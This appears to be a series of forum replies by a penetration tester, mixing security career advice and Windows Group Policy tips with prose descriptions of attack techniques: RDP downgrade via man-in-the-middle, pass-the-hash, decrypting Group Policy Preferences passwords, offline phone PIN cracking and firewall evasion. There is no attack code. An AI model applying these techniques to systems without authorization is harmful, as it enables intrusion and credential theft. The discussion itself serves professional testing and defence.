We have occasional success with this: http://blog.depthsecurity.com/2010/11/when-8021xpeapeap-ttls-is-worse-than-no.html

I think this is the first time I've heard of someone trying to get into InfoSec to avoid burnout

It seems like your current knowledge/skills would work well for some type of web application position, but you will need to get familiar with server side languages as well (PHP, ASP.NET, Java, etc.).

It's difficult to go right into a security role with no prior IT and/or development experience, so you would probably be better off trying to land a more general position and then work your way into security over time.

I don't think there's a straight-forward answer to that. If that condition is possible anywhere, it's going to depend greatly on the make and version of the firewall. You'd have to find some sort of glitch regarding checksums, payload contents, fragment reassembly, etc. Varying the ICMP type may be useful as well (i.e. timestamp instead of echo).

Research network fuzzing, and then compare what gets through with what's in the drop log.

Ah, you're right. I just glanced at it before I went out the door.

I'm still curious if he's tried something like the tool in the video I linked to. That seemed fairly comprehensive.

Ah, turns out I was wrong. You can't do an offline attack because you need to extract the hardware key.

Have you tried something like this? https://www.youtube.com/watch?v=S6OIK0oL6SI

It looks like Elcomsoft has a commercial tool too: http://www.elcomsoft.com/eppb.html That might be worth a shot if nothing else works and the photos are worth $80 to her.

Ah, maybe try WMI filtering then: http://technet.microsoft.com/en-us/library/cc779036(v=ws.10).aspx

That might help if all the target systems share a common attribute.

If all you're doing is registry changes, just use group policy: http://technet.microsoft.com/en-us/library/cc753092.aspx

That's much easier to manage.

I usually just try SMB because it's so much faster and uses the same account database. The only time I usually see RDP open when SMB isn't is for jump boxes, and those are usually configured to use multi-factor authentication, so there's no real point in trying a password-guessing attack.

If you can MitM with Cain, it'll try to drop the security level of the RDP session, and if successful, can capture RDP network communications in clear-text.

Group Policy?

http://support.microsoft.com/kb/816102

Oh, in that case, you may have to move as well. I'm not trying to discourage you, but it doesn't sound like there's a lot of opportunities over there. MaXe, despite his impressive skills, actually relocated to Australia for a full-time pen testing gig: https://forum.intern0t.org/blogs/maxe/132-living-down-under-beginning.html

I've personally had a difficult time getting people to implement client-side firewall changes. There's always a ton of push-back. I don't know if the sys admins just aren't as comfortable on the network side or what the deal is, but something that should be simple always seems to break everything. That's definitely a good strategy when implemented properly though.

With the network logon GPO, there's a corresponding one that disallows RDP for specified users, which is necessary since that's treated as an interactive logon, not a network logon. On the attacking side, that obviously requires cracking the hash instead of passing it, but it's not like that doesn't happen frequently Again, disabling the service or client-side firewalls could address that as well. I guess a blanket GPO is a good safety net.


I've never used it personally, but it's one I suggest be researched for anyone looking at enterprise password management. I saw one that did something similar, but it only changed after it was checked out by a user, effectively providing one-time passwords. The ManageEngine utility looks promising too. It even supports multi-factor, so you need a phone or RSA token in order to check out passwords.

Wow, I was expecting you to say you were 60 or something.

Why don't you leverage what you know instead of trying to start from scratch? Wep app pen testing is hot right now, and your .NET knowledge clearly puts you in a good position for understanding how ASP.NET applications work behind the scenes (I assume you're doing thick-client development since you didn't mention ASP).

And even if you want to start from scratch, 29 is not too late. However, you're going to have to accept that it's going to take years of work to become competent, and you may have to take a drop in pay and seniority to migrate into a relatively different field.

If I were you, I'd take use my existing knowledge and skills and take on some security responsibilities, or obtain a position that has such responsibilities, and then keep working towards a full-time security position step-by-step.

Also, welcome to the forums.

I thought this was simple to do offline if you open up the phone and remove the storage device. Invalid attempts aren't going to wipe it since that depends on the running OS software. You should be able to do that almost instantly if she was only using a four-digit PIN. I don't work with this much, so I don't know the specific tools, but I swear I've heard this attack discussed multiple times.

There's a group policy that disallows network authentication for the local users specified. We typically make organization's roll that out after we've run a train on them using those techniques. It ruins everything for us or whoever the next year, but it's simple and effective. Disallowing delegation for privileged accounts is huge too.

Another fun one is if they're setting the local admin's password via group policy preferences and you get a standard domain user account. You can read the groups.xml on the domain controller and there are scripts floating around that'll decrypt the encrypted password in it because Microsoft disclosed the key they used.

Edit: http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html

• Blank/Weak admin creds for SQL Server and Tomcat
• Still regularly see MS08-67 and NT4
• MitM attacks - ARP poisoning, name response spoofing, etc.
• Default credentials on web apps and devices
• Tons of random third-party applications that fall through the patching cracks
• VxWorks Memory disclosure is on about half of the assessments I do

I need to get going for my flight, but those are the ones that come to mind when I think of what I see over and over and over and over.